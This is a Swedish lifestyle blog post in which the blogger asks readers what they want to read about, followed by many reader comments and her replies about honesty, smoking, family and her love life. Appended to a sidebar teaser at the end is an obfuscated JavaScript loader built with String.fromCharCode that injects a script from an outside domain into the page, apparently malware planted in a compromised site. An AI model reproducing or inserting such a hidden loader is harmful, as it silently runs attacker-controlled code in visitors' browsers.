Nu vill jag ha just DIN åsikt! :) -Tack på förhand!

image

Godmorgon Fining! lilleman är på dagis, Morgonpasset avklarat….. Nu frukost, innan jag fortsätter mot My’s Blommor 🙂

image

Jag känner i magen att idag blir en BRA dag…. Vi får väl se om magkänsla stämmer 😉

image

här inne på bloggen så får du följa min vardag… pendlingen mellan Öland/Stockholm, träning, och min resa mot ett nyttigare och hälsosamare liv… Varvat med mingel, vänner, mode, jobb, blommor osv. Jag är ingen ren ”träningsblogg” eller ”modeblogg” tex…

Detta är mitt liv och är mer en”lifestyle” blogg.

Jag kommer alltid att vara ärlig, jag låtsas inte att allting är perfekt, jag kan erkänna mina misstag, bjuda på mig själv med en humor med självdistans…

Men nu skulle jag vilja veta vad DU vill veta mer om? -är det någonting DU saknar? -någonting du skulle vilja veta mer om? Osv…

Skriv gärna några rader med feedback, då det för mig är jätte viltogt att veta vad just du tycker. Utan dig är bloggen ingenting!

-Glöm aldrig det! Du är viktig!

Att peppa varandra, inspirera varandra och lyfta fram varandra genom träning, kost, hälsa är mitt motto! Men som sagt, skriv  gärna några rader….. 

image

Nu ska jag ta en kaffe innan jag fortsätter på My’s Blommor 🙂

-Tack på förhand!

Jag väntar med spänning på din åsikt och dina frågor 🙂 Även om du inte brukar kommentera så skulle jag bli väldigt glad om du ville göra det just denna gången <3 Kram /My Martens

63 Komentarer

 1. God morron från Falun.
  Jag uppskattar din blogg precis som den är, rak, öppen och så ärlig. Jag tröttnar annars snabbt när det är för mycket ”glam o glamour”…..
  Kram o ha en skön dag

 2. Hej My!!
  Jag tycker din blogg är så härlig & så ärlig ?
  Jag saknar inte något för man får följa just din vardag på alla plan.
  Fortsätt vara den du är och skriv som du gör.
  Kram Annica

 3. Gillar din blogg som den är ?
  Är nyfiken på hur ditt liv förändrats sen du blev en mer känd person? Positivt o negativt?
  Hur ser framtidsplanerna ut? Blir det nåt boende i Sthlm? ?
  Och sist, hur går de
  Med kärleken? E ju såå nyfiken o hoppas varje Dag att du ska ha skrivit nåt hihi.
  Kram på dej

 4. Hej!
  Du har en toppenbra blogg med blandade inlägg.
  Jag skulle önska att du skrev lite om företagande. Från idé till handling.
  Hur man kan gå tillväga om man har en idé och vill starta upp något vid sidan om sitt vanliga jobb till att börja med. Du är väldigt driven och målinriktad så kanske har du lite tips att ge. Må så gott och tack på förhand!

 5. Hej, jag tycker om din blogg precis som den är, du skriver öppet o ärligt o det är jätte kul att få följa dig i din vardag/helg! Du verkar vara en toppen tjej! Lycka till med allt! Kram till dig!

 6. Hej! Jag tycker att din blogg är väldigt inspirerande då du delar med dig av ”hela” ditt liv inte bara de fantastiska bitarna. Tror att det är det som gör att den är så omtyckt. Man känner igen sig. Fortsätt bjuda på dig själv med både glitter och glamour och även tankar , funderingar, åsikter och misstag.. Vet att du inte lagar så mycket mat:-) men lite recept av nåt slag hade varit kul. Dina träningstips är också peppande! Gärna fler:-)
  Osså undrar jag med hur det går med kärleken:-) Hoppas att du fortfarande har fjärilar i magen för du är verkligen värd att träffa Mr.Right!! Lyllos Han<3<3<3 Kram

  • Hej Christina! Vad glad jag blev! Både för att du tog dig tiden att skriva, men också för dina fina ord och din omtanke <3 -Tack! Vad det gäller kärleken så återkommer jag i den frågan när jag har någonting att berätta =) Ha en sön kväll! Kram

  • Tack snälla Malin! Det ska jag absolut försöka att göra…. =) jag är bara mig själv, gillar man det så är man mer än välkommen att stan kvar här. Gillar man det inte så behöver man ju inte läsa… =) Kram på dig!

 7. Hej My!
  Det var länge sedan jag kommenterade nu, men jag läser din blogg varje dag – och älskar den!! Du skriver rakt och ärligt, om det mesta – från ”vardag till fest” / smått och stort / glatt och sorgligt..helt enkelt toppen! ?
  Men en sak du skulle kunna skriva om är lite tips på restauranger och uteställen i Stockholm, eftersom du är där ganska ofta och kanske du har lite koll.. , annars är bloggen som sagt grymt bra!
  Önskar dig en fin dag ?
  Kram Lotta

  • Hej Lotta! tack snälla du <3 Jaaaa… varför har jag inte tänkt på det ?! självklart ska jag tipsa om härliga ställen i Stockholm =) Bra ide! tack <3 kramar

 8. Mer läsning om ditt vardagsliv med familjen. Även om företagandet och hur ditt liv förändrats under åren sen tex skoltiden till nu och framtidsdrömmar!

  • Hej Frida! tack för att du tog dig tid att skriva.. Det har jag faktiskt inte tänkt på… Skoltiden, hmm… det blir ett låååångt inlägg vid ett senare tillfälle. Men absolut någonting jag ska ta upp. jag har dock bott sjäv sen 13-14 års ålder. Inte gått någon skola utan varit tvungen att bli vuxen snabbt och försörja mig själv… återkommer o det! Men det har bara format mig till det jag är idag, positiv, stark och målmedveten.. =) Kram så länge..

 9. Du är lite för hejsan svejsan, vill vara så käck och med överallt. Ditt utseende vill du gärna ha kredit för och höra hur tjusig du är. Tona ner och tagga ner lite grann. Tycker personligen inte att du är särskilt snygg men smaken är ju olika. Du kan ju också tänka på att inte blanda in den där Grafskan så mycket.

  • Ööh. Ärlighet är ju bra, men det går att framföra saker på ett trevligare sätt än ”tycker personligen att du inte är särskilt snygg”

  • Negativ feedback är alltid bra och det är det som får en att växa och bli bättre. Men sådan här nedlåtande kritik blir lite patetisk och ännu mer patetiskt blir det när du inte ens kan skriva ut ditt namn.

  • Hej ”LVA”! hejsan svejsan är inte riktigt ett uttryck som jag kan relatera till. Hmm, lite underton utav bitterhet i ditt meddelande. Är det det? Det är så lätt att man missförstår varandra i skrift. Men jag är inte en person som lägger någon vikt i att varken tagga ner, eller speeda upp. Jag är den jag är. jag är mig själ. Gillar man mig, så gör man, gillar man mig inte så kan jag inte påverka det.. Det bästa med bloggar och sociala medier är ju att man som läsare själv har möjligheten att INTE läsa om man inte vill =) Sen att du inte tycker jag är snygg, tja…. vad ville du ha förmedla med den kommentaren? -positiv känsla? Knappast. jag tycker att man ska peppa, stötta och lyfta fram varandra, DET är mitt motto? ”grafskan” menar du min bästa vän, syster och min närmaste? Magdalena? Blanda in och blanda in? Hon är min familj =) Det lixom bara blev så…. Anyway… tack för att du tog dig tiden att skriva. Önskar dig en skön kväll! Mh MY Martens

 10. Din blogg är så bra för du är ärlig!! Tack! Jag undrar om du lyckades hålla uppe rökningen? Om inte så är du inte mer än människa, och då vill vi veta det. Vi är många som kämpar med nikotinet. Kram

  • Hej Karin! tack för att du tog dig tiden att skriva… -det betyder sååå mycket när ni gör det! Rökningen…. nja… inte på topp! Höll upp 87 dagar. Fest rökte och fastnade igen. Inte som innan (1.5 paket/dagen) men jag röker ett par dagar i veckan … kram #ärlighetvararlängst visst? ?

 11. Herregud säger jag bara….förstår inte varför folk ska trycka ner andra för! Måste vara personer som mår väldigt dåligt!
  Du är JÄTTESNYGG! Rolig, intelligent, modig, omtänksam och mycket mera!
  Älskar din blogg och tycker det är kul att följa din resa mot ett sundare liv!
  Och Maggans blogg följer jag med och älskar hennes blogg minst lika mycket!!!
  Kämpa på precis som du gör!
  Kraaaam

  • TACK SNÄLLA Camilla <3 Vilka ord!!! tusen tusen tack! <3 Jag förstår faktiskt inte heller det, man ska lyfta varandra och stärka varandra ju! sååååå mycket trevligare <3 Kram på dig!

 12. Hej My, kan sakna lite mer inlägg om dig och lilleman som fam. Tycker det lätt kan bli för mycket om träning och hur du åker mellan jobb och så. Annars en toppen blogg ?

 13. Din blogg är bra som beskriver typ allt du gör. Företaget, din fina lilla son och allt annat ?
  Fortsätt så, tycker jag.

 14. Eftersom jag själv har lagt om min livsstil helt, kämpar med en höftskada, tränar och har hållit mig sockerfri i snart 5 månader, så gillar jag att läsa om din träning, kost osv.
  Det ger mig inspiration och bra tips.
  Du är otroligt ambitiös och jag förstår inte hur du orkar med de arbetstider du har ? Jag blir lite orolig ibland att du ska bli utbränd, trots att jag inte känner dig ?
  Sköt om dig!

  • åhhhhh! vad duktig du är! -heja heja! Vi ska ju peppa varandra och hjälpas åt! det blir sååååå mycket roligare då! tack för att du tog dig tiden att kommentera…. <3 kramar

 15. Tycker om din blogg o läser den varje dag… tycker du bjuder på dig själv! Gillar att läsa om din träning o kosten… du får gärna bjuda lite mer på dina ”tabbar” både med kost, träning hår/smink/kläder. Du ser jämt så perfekt ut ? (snygg as hell precis som Maggan :-P)

  • Hej Caroline! Jag har inga problem med att bjuda på tabbar =) Jag har en rejäl självdistans och kan absolut skriva mer om det =) -tack för tipset! kramar! ps Jag är lååååångt ifrån perfekt!

   • Ja jag tycker du verkar vara en rolig tjej med humor så lite tabbar o pinsamheter från dig skulle säkert höja stämningen för många ? haha det är svårt att vara perfekt så det tror jag inte men du o ditt liv ser rätt positivt ut (utåt sett) Kraam

 16. Jag tycker att du verkar påbörja mycket som vi läsare aldrig får ett ”avslut” på. Nya projekt hela tiden men aldrig uppvisade resultat.
  Det skrivs mycket om ärlighet vilket jag inte tycker stämmer. Jag skulle aldrig kunna suga åt mej uppmärksamhet och hurrarop genom att varken ”sluta röka” eller berätta om min nya upptagna kärlek och sen kalla mej ärlig ?
  Min åsikt och som sagt all kritik är bra kritik och till för att jobba på.

  • Hej AnnaPanna! jag står för ärligheten till 100% så där håller jag INTE med dig. vad det gäller ”kärleken” så har jag skrivit i ett inlägg om att jag har fjärilar i magen. Det är dessutom en underbar känsla! Att jag inte kan gå ut med vem det är eller hur det är, beror helt enkelt på att jag/vi inte vet vad det leder till… då skulle det bara göra mer ”skada” än nytta om man gick ut med det innan man vet det själva… Det hoppas jag väl ändå att du kan förstå? Det är ju inte för att inte vara ”ärlig” det handlar ju bara om att det är så nytt än, och jag vill se vart det leder till =) Jag höll upp med rökningen i 87 dagar -stolt som f*n över just det =) Sen snubblade jag in på fest rökningen. Nu röker jag ett par gånger i veckan…. inte längre 1.5paket/dagen, men ett par gånger i veckan. VILKET jag har skrivit om ju… så ärligheten kan du faktiskt inte ta ifrån mig ? Men jag uppskattar att du tog dig tiden att skriva, och jag hoppas att du kanske förstår mig lite bättre nu? Min fråga till dig är bara, vad är det jag inte avslutat? jag avslutar ju ALLTID det jag påbörjat…. Stor kram <3

 17. Hej my! Bloggen är super bra och jag gillar hur positiv du är när du skriver.. Man blir glad av att läsa det!!
  Jag skulle vilja läsa mer om din familj, om din son och om hur folk är mot dig på Öland. Har du många vänner där?

 18. Hej My
  Tycker mycket om din blogg. Du verkar vara en otroligt stark o godhjärtad person. Många bollar i luften hela tiden

 19. Hej My, jag kommenterar aldrig någonting men någon gång ska vara den första ? tycker du har en bra inspirerande blogg som du lyckats bra med. Är imponerad över hur du lyckas med allt du tar dig för och att du ser fördelar och möjligheter istället för svårigheter. Fortsatt lycka till!

  • Tack Snälla Fia! vad glad jag blir =) Jag lyckas dock inte als med allt jag tar mig för… men jag har en j*la drivkraft och ger inte upp så lätt ? Kram på dig!

 20. Hej
  Skulle vilja veta mer om hur du gör när du är i Sthlm har du lägenhet där el var bor du? Bor dina föräldrar/syskon också i Kalmar? O om dina kärlek ? bor han också i Kalmar el i Sthlm? Kram

 21. Jag tycker din blogg är bra över lag. Det jag skulle önska är mer att du fullföljer, berätta hur det gick med att sluta röka, hur är det med din kärlek som pirrar, lägenheten du skulle skaffa i Sthlm osv.. /Karins

 22. Hej!
  Jag är nyfiken på ditt hollandsjobb, det vore roligt att läsa mer om hur det.
  Tack för en rolig och varierad blogg! ?
  //Ullis

 23. Jag skulle tycka det vore roligt att läsa mer om blom- och trädgårdstips. Förmodar att du har en uppsjö av tips och inspiration där. Kram!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/